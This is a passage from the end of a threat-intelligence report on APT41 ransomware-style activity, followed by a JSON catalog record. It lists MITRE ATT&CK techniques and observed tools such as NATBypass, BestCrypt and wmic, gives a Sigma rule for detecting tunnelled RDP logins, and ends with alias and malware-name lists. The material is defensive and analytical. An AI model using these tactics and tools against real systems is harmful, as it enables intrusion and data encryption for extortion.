Desktop Protocol\r\nT1021.002: Remote Services: SMB/Windows Admin Shares\r\nT1021.003: Remote Services: Distributed Component Object Model\r\nT1047: Windows Management Instrumentation\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 17 of 19\n\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1069.002: Permission Groups Discovery: Domain Groups\r\nT1070.004: Indicator Removal: File Deletion\r\nT1087.002: Account Discovery: Domain Account\r\nT1124: System Time Discovery\r\nT1190: Exploit Public-Facing Application\r\nT1482: Domain Trust Discovery\r\nT1486: Data Encrypted for Impact\r\nT1505.003: Server Software Component: Web Shell\r\nT1518.001: Software Discovery: Security Software Discovery\r\nT1560.001: Archive Collected Data: Archive via Utility\r\nT1572: Protocol Tunneling\r\nTools and Tactics\r\nJetico’s BestCrypt (Impact)\r\nBitlocker (Impact)\r\nMiPing (Discovery)\r\nNATBypass (Command and Control)\r\nmakecab (Collection)\r\ndsquery (Discovery)\r\nwhoami (Discovery)\r\nipconfig (Discovery)\r\nwmic (Discovery/Execution)\r\nnltest (Discovery)\r\nnet (Discovery)\r\ndel (Defense Evasion)\r\nDetections\r\nSigma rule to detect RDP usage through a previously exposed RDP port (by using tools such as NATBypass):\r\ntitle: NATBypass Usage with Remote Desktop Service\r\nid: c7e80b57–0ffc-4c46-b6c2–6bc0a245dffc\r\nstatus: experimental\r\ndescription: RDP login with localhost source address may be a tunnelled login\r\nreferences:\r\n — https://medium.com/p/24fc0f49cad1\r\n — https://github.com/cw1997/NATBypass/\r\nauthor: Hendrik Baecker\r\ndate: 2022/11/28\r\ntags:\r\n — attack.command_and_control\r\n — attack.t1090\r\nlogsource:\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 18 of 19\n\nproduct: windows\r\n service: security\r\ndetection:\r\n selection:\r\n EventID:\r\n — 4778\r\n — 4779\r\n ClientAddress:\r\n — ‘::1’\r\n — ‘127.0.0.1’\r\n SessionName|startswith: ‘RDP-Tcp’\r\n condition: selection\r\nfalsepositives:\r\n — Unknown\r\nlevel: high\r\nSource: https://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nhttps://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia" ], "origins": [ "web" ], "references": [ "https://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1" ], "report_names": [ "apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1" ], "threat_actors": [ { "id": "c7d9878a-e691-4c6f-81ae-84fb115a1345", "created_at": "2022-10-25T16:07:23.359506Z", "updated_at": "2026-04-10T02:00:04.556639Z", "deleted_at": null, "main_name": "APT 41", "aliases": [ "BrazenBamboo", "Bronze Atlas", "Double Dragon", "Earth Baku", "G0096", "Grayfly", "Operation ColunmTK", "Operation CuckooBees", "Operation ShadowHammer", "Red Kelpie", "SparklingGoblin", "TA415", "TG-2633" ], "source_name": "ETDA:APT 41", "tools": [ "9002 RAT", "ADORE.XSEC", "ASPXSpy", "ASPXTool", "AceHash", "Agent.dhwf", "Agentemis", "AndroidControl", "AngryRebel", "AntSword", "BLUEBEAM", "Barlaiy", "BlackCoffee", "Bladabindi", "BleDoor", "CCleaner Backdoor", "CHINACHOPPER", "COLDJAVA", "China Chopper", "ChyNode", "Cobalt Strike", "CobaltStrike", "Crackshot", "CrossWalk", "CurveLast", "CurveLoad", "DAYJOB", "DBoxAgent", "DEADEYE", "DEADEYE.APPEND", "DEADEYE.EMBED", "DEPLOYLOG", "DIRTCLEANER", "DUSTTRAP", "Derusbi", "Destroy RAT", "DestroyRAT", "DodgeBox", "DragonEgg", "ELFSHELF", "EasyNight", "Farfli", "FunnySwitch", "Gh0st RAT", "Ghost RAT", "HDD Rootkit", "HDRoot", "HKDOOR", "HOMEUNIX", "HUI Loader", "HidraQ", "HighNoon", "HighNote", "Homux", "Hydraq", "Jorik", "Jumpall", "KEYPLUG", "Kaba", "Korplug", "LATELUNCH", "LOLBAS", "LOLBins", "LightSpy", "Living off the Land", "Lowkey", "McRAT", "MdmBot", "MessageTap", "Meterpreter", "Mimikatz", "MoonBounce", "MoonWalk", "Motnug", "Moudour", "Mydoor", "NTDSDump", "PACMAN", "PCRat", "PINEGROVE", "PNGRAT", "POISONPLUG", "POISONPLUG.SHADOW", "POTROAST", "PRIVATELOG", "PipeMon", "PlugX", "PortReuse", "ProxIP", "ROCKBOOT", "RbDoor", "RedDelta", "RedXOR", "RibDoor", "Roarur", "RouterGod", "SAGEHIRE", "SPARKLOG", "SQLULDR2", "STASHLOG", "SWEETCANDLE", "ScrambleCross", "Sensocode", "SerialVlogger", "ShadowHammer", "ShadowPad Winnti", "SinoChopper", "Skip-2.0", "SneakCross", "Sogu", "Speculoos", "Spyder", "StealthReacher", "StealthVector", "TERA", "TIDYELF", "TIGERPLUG", "TOMMYGUN", "TVT", "Thoper", "Voldemort", "WIDETONE", "WINNKIT", "WINTERLOVE", "Winnti", "WyrmSpy", "X-Door", "XDOOR", "XMRig", "XShellGhost", "Xamtrav", "ZXShell", "ZoxPNG", "certutil", "certutil.exe", "cobeacon", "gresim", "njRAT", "pwdump", "xDll" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434248, "ts_updated_at": 1775826727, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6767fd3af527538ea0892fb48215fc6b1a17fc1d.pdf", "text": "https://archive.orkl.eu/6767fd3af527538ea0892fb48215fc6b1a17fc1d.txt", "img": "https://archive.orkl.eu/6767fd3af527538ea0892fb48215fc6b1a17fc1d.jpg" } }